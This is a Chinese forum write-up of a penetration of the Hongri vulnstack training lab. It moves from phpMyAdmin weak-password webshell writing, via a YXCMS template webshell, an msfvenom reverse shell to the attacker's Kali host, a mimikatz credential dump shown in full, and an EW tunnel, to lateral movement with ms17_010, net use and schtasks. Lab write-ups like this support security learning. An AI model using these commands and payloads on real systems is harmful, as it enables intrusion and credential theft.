红日靶场一的wp
前言
最近终于不是很忙了,抽时间复现了一下红日的靶场,一方面是熟练技术,另一方面争取在练习中填充自己的知识库。本人菜鸡,只是记录一下复现过程,大佬勿喷。
参考文章
最近在关注whoami大佬的内网渗透相关文章,本篇也是复现之一。
https://www.freebuf.com/articles/network/242277.html
https://www.freebuf.com/articles/web/280775.html
靶场以及环境地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
环境拓扑图
攻击机kali:
ip:192.168.66.128
VM1 Web服务器:
外网ip:192.168.66.37
内网ip:192.168.52.143
VM2 域成员:
内网ip:192.168.52.141
VM3 域控:
内网ip:192.168.52.138
外网渗透
首先进行信息搜集,御剑后台扫描
发现有phpmyadmin,phpinfo,进去看一下
phpinfo中看到真实ip,绝对路径等信息
C:/phpstudy/WWW/phpinfo.php
进入phpmyadmin
后台直接弱口令,root,root,进入后台
phpmyadmin后台getshell的常用手段有以下几种方式:
1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell
执行以下sql语句show variables like '%secure%';
发现secure_file_priv=NULL,没有写入权限,无法用select into outfile方法写入shell。
试试利用全局变量general_log去getshellshow variables like '%general%';
我们将全局日志开启并将保存日志的目录设为web目录set global general_log=on;
set global general_log_file='C:/phpStudy/WWW/hack.php';
设置成功
将一句话木马写入hack.phpselect ''
测试成功
蚁剑连接成功
竟然是administrator权限
发现还有一个yxcms,查看一下
这是他的一个模板,公告信息暴露了后台登录地址和默认账户密码
后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456
进入后台
发现在前台模板这里可以编辑网页
写入一句话木马
接下来就是找到这个网页的路径,继续御剑扫描
去robots.txt看看有没有什么敏感文件和路径
session:
http://192.168.66.37/yxcms/protected/apps/default/view/default/acomment.php 找到了刚才编辑的文件
测试一下能否连接
测试成功,可以链接进去
回到蚁剑,进行信息搜集
ipconfig /all 查看本机ip,所在域
route print 打印路由信息
net view 查看局域网内其他主机名
arp -a 查看arp缓存
net start 查看开启了哪些服务
net share 查看开启了哪些共享
net share ipc$ 开启ipc共享
net share c$ 开启c盘共享
net use \192.168.xx.xx\ipc$ “” /user:”” 与192.168.xx.xx建立空连接
net use \192.168.xx.xx\c$ “密码” /user:”用户名” 建立c盘共享
dir \192.168.xx.xx\c$\user 查看192.168.xx.xx c盘user目录下的文件
net config Workstation 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user 查看本机用户列表
net user /domain 查看域用户
net localgroup administrators 查看本地管理员组(通常会有域用户)
net view /domain 查看有几个域
net user 用户名 /domain 获取指定域用户的信息
net group /domain 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain 查看域中某工作组
net group “domain admins” /domain 查看域管理员的名字
net group “domain computers” /domain 查看域中的其他主机名
net group “doamin controllers” /domain 查看域控制器(可能有多台)
发现了192.168.52.0/24这个网段,存在域环境
新添加一个用户,加入管理员组
net user test Hack1234! /add
net localgroup administrators test /add
net localgroup administrators
查看3389端口是否开启
netstat -ano |find “3389”
没有开启输入如下命令开启REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
如果开启防火墙,我们可以反弹一个msf的shell回来,然后用enable_rdp尝试关闭防火墙。
先生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.66.128 lport=4444 -f exe >shell.exe
利用蚁剑上传到目标机器
kali设置好监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.66.128
set lport 4444
run
蚁剑执行shell.exe
收到反弹的shell
getsystem提权一下,成功拿到系统权限
run post/windows/manage/enable_rdp 关闭防火墙
打开远程桌面
用刚才添加的用户登录
利用mimikatz抓取密码
这里我利用msf自己的kiwi模块
首先将进程迁移到一个稳定的x64的SYSTEM权限进程
migrate 380
load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords
uthentication Id : 0 ; 12204332 (00000000:00ba392c)
Session : RemoteInteractive from 2
User Name : test
Domain : STU1
Logon Server : STU1
Logon Time : 2021/8/12 14:33:17
SID : S-1-5-21-1982601180-2087634876-2293013296-1001
msv :
[00000003] Primary
* Username : test
* Domain : STU1
* LM : 748d60a86f6283237e51f0bf38bde884
* NTLM : c98186bcd6e6b2536104502945d0db69
* SHA1 : 72252d59f7fbe785138c69bdaeeedce999b07102
tspkg :
* Username : test
* Domain : STU1
* Password : Hack1234!
wdigest :
* Username : test
* Domain : STU1
* Password : Hack1234!
kerberos :
* Username : test
* Domain : STU1
* Password : Hack1234!
ssp :
credman :
Authentication Id : 0 ; 12204300 (00000000:00ba390c)
Session : RemoteInteractive from 2
User Name : test
Domain : STU1
Logon Server : STU1
Logon Time : 2021/8/12 14:33:17
SID : S-1-5-21-1982601180-2087634876-2293013296-1001
msv :
[00000003] Primary
* Username : test
* Domain : STU1
* LM : 748d60a86f6283237e51f0bf38bde884
* NTLM : c98186bcd6e6b2536104502945d0db69
* SHA1 : 72252d59f7fbe785138c69bdaeeedce999b07102
tspkg :
* Username : test
* Domain : STU1
* Password : Hack1234!
wdigest :
* Username : test
* Domain : STU1
* Password : Hack1234!
kerberos :
* Username : test
* Domain : STU1
* Password : Hack1234!
ssp :
credman :
Authentication Id : 0 ; 1978767 (00000000:001e318f)
Session : Interactive from 1
User Name : Administrator
Domain : GOD
Logon Server : OWA
Logon Time : 2021/8/12 12:58:25
SID : S-1-5-21-2952760202-1353902439-2381784089-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : GOD
* LM : 624aac413795cdc17e51f0bf38bde884
* NTLM : 92f7e7d670d3968e70bb3215760678dd
* SHA1 : 8a2023f0b434f3125481aaa9c226933f7837f9f9
tspkg :
* Username : Administrator
* Domain : GOD
* Password : Test1234!
wdigest :
* Username : Administrator
* Domain : GOD
* Password : Test1234!
kerberos :
* Username : Administrator
* Domain : GOD.ORG
* Password : Test1234!
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2021/8/12 12:57:01
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : STU1$
Domain : GOD
Logon Server : (null)
Logon Time : 2021/8/12 12:57:01
SID : S-1-5-20
msv :
[00000003] Primary
* Username : STU1$
* Domain : GOD
* NTLM : fc38c6ad256874216d849314f65cbde1
* SHA1 : 5ec637456b9d71a582a806667137184b04351a29
tspkg :
wdigest :
* Username : STU1$
* Domain : GOD
* Password : 4c e7 fb b8 6d d9 28 58 2d 03 1d b1 ad 65 b3 29 b2 27 1a 12 d5 39 89 b9 d0 a2 4e 33 6b 89 d5 fe fe a3 fd 7b c2 c5 63 71 41 4b 5e fc 09 cd 3f 8f c6 80 9e 05 b3 e4 7d 20 0b 43 8a 4a a3 72 4f bf 7e b9 77 eb e1 ce 22 3e 0f f0 20 e4 b2 5e e6 ff 43 c1 bf 0f c1 69 ff 2e 5d 02 c7 d0 f0 6f 08 3f 9c 8c c2 bd d6 35 36 ce 59 f5 9b d4 08 d3 6c 0c a5 36 4d a6 5e da cb b4 73 3b d6 f3 a1 91 3c 83 7a e9 38 1a bd 73 bd 33 07 0b 3f 72 56 6f 90 2a cd 06 a0 17 49 59 26 52 c6 67 da 92 0c 0d 9f 2d 57 60 55 6a 74 a7 68 6e 52 06 67 d4 43 3d cd 50 d0 73 22 a3 40 ea 3a c7 45 57 67 df ae 31 a8 94 cf 28 78 05 b8 8f 24 81 4f e9 ee 1c 04 09 30 15 16 7d 5d db 2d 7b 32 f4 fb 83 34 c2 fa 6f 61 e8 1b 7b bd 28 12 c4 34 9d 5a b1 dc dc 67 41 49 6e
kerberos :
* Username : stu1$
* Domain : GOD.ORG
* Password : 4c e7 fb b8 6d d9 28 58 2d 03 1d b1 ad 65 b3 29 b2 27 1a 12 d5 39 89 b9 d0 a2 4e 33 6b 89 d5 fe fe a3 fd 7b c2 c5 63 71 41 4b 5e fc 09 cd 3f 8f c6 80 9e 05 b3 e4 7d 20 0b 43 8a 4a a3 72 4f bf 7e b9 77 eb e1 ce 22 3e 0f f0 20 e4 b2 5e e6 ff 43 c1 bf 0f c1 69 ff 2e 5d 02 c7 d0 f0 6f 08 3f 9c 8c c2 bd d6 35 36 ce 59 f5 9b d4 08 d3 6c 0c a5 36 4d a6 5e da cb b4 73 3b d6 f3 a1 91 3c 83 7a e9 38 1a bd 73 bd 33 07 0b 3f 72 56 6f 90 2a cd 06 a0 17 49 59 26 52 c6 67 da 92 0c 0d 9f 2d 57 60 55 6a 74 a7 68 6e 52 06 67 d4 43 3d cd 50 d0 73 22 a3 40 ea 3a c7 45 57 67 df ae 31 a8 94 cf 28 78 05 b8 8f 24 81 4f e9 ee 1c 04 09 30 15 16 7d 5d db 2d 7b 32 f4 fb 83 34 c2 fa 6f 61 e8 1b 7b bd 28 12 c4 34 9d 5a b1 dc dc 67 41 49 6e
ssp :
credman :
Authentication Id : 0 ; 50916 (00000000:0000c6e4)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2021/8/12 12:57:00
SID :
msv :
[00000003] Primary
* Username : STU1$
* Domain : GOD
* NTLM : fc38c6ad256874216d849314f65cbde1
* SHA1 : 5ec637456b9d71a582a806667137184b04351a29
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : STU1$
Domain : GOD
Logon Server : (null)
Logon Time : 2021/8/12 12:57:00
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : STU1$
* Domain : GOD
* Password : 4c e7 fb b8 6d d9 28 58 2d 03 1d b1 ad 65 b3 29 b2 27 1a 12 d5 39 89 b9 d0 a2 4e 33 6b 89 d5 fe fe a3 fd 7b c2 c5 63 71 41 4b 5e fc 09 cd 3f 8f c6 80 9e 05 b3 e4 7d 20 0b 43 8a 4a a3 72 4f bf 7e b9 77 eb e1 ce 22 3e 0f f0 20 e4 b2 5e e6 ff 43 c1 bf 0f c1 69 ff 2e 5d 02 c7 d0 f0 6f 08 3f 9c 8c c2 bd d6 35 36 ce 59 f5 9b d4 08 d3 6c 0c a5 36 4d a6 5e da cb b4 73 3b d6 f3 a1 91 3c 83 7a e9 38 1a bd 73 bd 33 07 0b 3f 72 56 6f 90 2a cd 06 a0 17 49 59 26 52 c6 67 da 92 0c 0d 9f 2d 57 60 55 6a 74 a7 68 6e 52 06 67 d4 43 3d cd 50 d0 73 22 a3 40 ea 3a c7 45 57 67 df ae 31 a8 94 cf 28 78 05 b8 8f 24 81 4f e9 ee 1c 04 09 30 15 16 7d 5d db 2d 7b 32 f4 fb 83 34 c2 fa 6f 61 e8 1b 7b bd 28 12 c4 34 9d 5a b1 dc dc 67 41 49 6e
kerberos :
* Username : stu1$
* Domain : GOD.ORG
* Password : 4c e7 fb b8 6d d9 28 58 2d 03 1d b1 ad 65 b3 29 b2 27 1a 12 d5 39 89 b9 d0 a2 4e 33 6b 89 d5 fe fe a3 fd 7b c2 c5 63 71 41 4b 5e fc 09 cd 3f 8f c6 80 9e 05 b3 e4 7d 20 0b 43 8a 4a a3 72 4f bf 7e b9 77 eb e1 ce 22 3e 0f f0 20 e4 b2 5e e6 ff 43 c1 bf 0f c1 69 ff 2e 5d 02 c7 d0 f0 6f 08 3f 9c 8c c2 bd d6 35 36 ce 59 f5 9b d4 08 d3 6c 0c a5 36 4d a6 5e da cb b4 73 3b d6 f3 a1 91 3c 83 7a e9 38 1a bd 73 bd 33 07 0b 3f 72 56 6f 90 2a cd 06 a0 17 49 59 26 52 c6 67 da 92 0c 0d 9f 2d 57 60 55 6a 74 a7 68 6e 52 06 67 d4 43 3d cd 50 d0 73 22 a3 40 ea 3a c7 45 57 67 df ae 31 a8 94 cf 28 78 05 b8 8f 24 81 4f e9 ee 1c 04 09 30 15 16 7d 5d db 2d 7b 32 f4 fb 83 34 c2 fa 6f 61 e8 1b 7b bd 28 12 c4 34 9d 5a b1 dc dc 67 41 49 6e
ssp :
credman :
可知
域控账户:Administrator
密码为:Test1234!
横向移动:
for /L %I in (1,1,254) DO <span class="label label-primary">@ping</span> -w 1 -n 1 192.168.52.%I | findstr "TTL="
探测到三台主机,其中一台是以获取到的目标机器ip:192.168.52.143
给msf添加路由run autoroute -s 192.168.52.0/24
发现另外两Ip 192.168.52.141 192.168.52.138
我们利用获取到的win7作为跳板机,开启隧道,让我们kali的其他工具可以进入内网进行攻击
我们利用ew开启隧道
upload /home/kali/ew/ew_for_Win.exe c://
在kali和跳板机分别配置
kali ./ew_for_linux64 -s rcsocks -l 1080 -e 1234
WIN7 ew_for_Win.exe -s rssocks -d 192.168.66.128 -e 1234
配置proxychains的socks5为1080
利用Nmap进行信息搜集
这里我直接尝试检测445端口是否开发,一般可以检测一下445 139 之类的端口
直接用 auxiliary/scanner/smb/smb_ms17_010 模块检测
set rhosts 192.168.52.141
run
set rhosts 192.168.52.138
run
发现都开放,经过测试直接打打不开,所以用另一条思路。
前面拿到了域控账户密码,尝试使用远程桌面的方式
nmap扫描3389端口发现关闭
使用msf的 auxiliary/admin/smb/ms17_010_command 模块打开
set rhosts 192.168.52.141
set command REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
这里注意转义“\”
成功执行
可以打开远程桌面
添加一个账户即可,也可以使用域控用户和密码登录
域管理员为
域控ip为192.168.52.138
接下来尝试进入控制域控
和进入域成员操作一样,尝试打开3389端口
发现失败了,换个思路
先用win7连接域控的c盘共享
net use \\192.168.52.138\c$ "Test1234!" /user:"administrator"
dir \\192.168.52.138\c$
将win7主机上的shell.exe上传到域控上
copy c:\phpstudy\www\shell.exe \\192.168.52.138\c$
启动一个计划任务,在kali设置监听获取反弹shell,我这里执行失败了
schtasks /create /tn “test” /tr C:\shell.exe /sc once /st 18:05 /S 192.168.52.138 /RU System /u administrator /p “Test1234!”
继续换另一个思路,感觉域控开了防火墙,使用sc远程关闭防火墙
sc \192.168.52.138 create unablefirewall binpath= “netsh advfirewall set allprofiles state off”sc \192.168.52.138 start unablefirewall
还是失败了,具体原因之后会再复盘一下
看到有老哥用CS直接获取,之后会取练习一下CS,尝试获取
总结
这个靶场比较简单,虽然最后域控没拿下,但是有几个点还是不错的。首先phpmyadmin的getshell,其次就是msf的一些功能模块,通过练习更加熟悉。当然,横向渗透的时候,共享文件夹。共享C盘,sc,schtasks的练习使用,也算是有不少的收获。接下来会练习使用CS,希望之后这类问题可以用CS搞定。
| 用户名 | 金币 | 积分 | 时间 | 理由 |
|---|---|---|---|---|
| Track-聂风 | 35.00 | 0 | 2021-08-14 15:03:17 | 投稿活动额外打赏 |
| Track-聂风 | 70.00 | 0 | 2021-08-14 15:03:03 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
返回首页
技术文章投稿区
技术文章
代码审计
实战纪实
漏洞文章
安全工具
投稿专区
秋紫山
发表于 9个月前
大佬,我下载的win7里面开启不了phpstudy。快哭了
评论列表
加载数据中...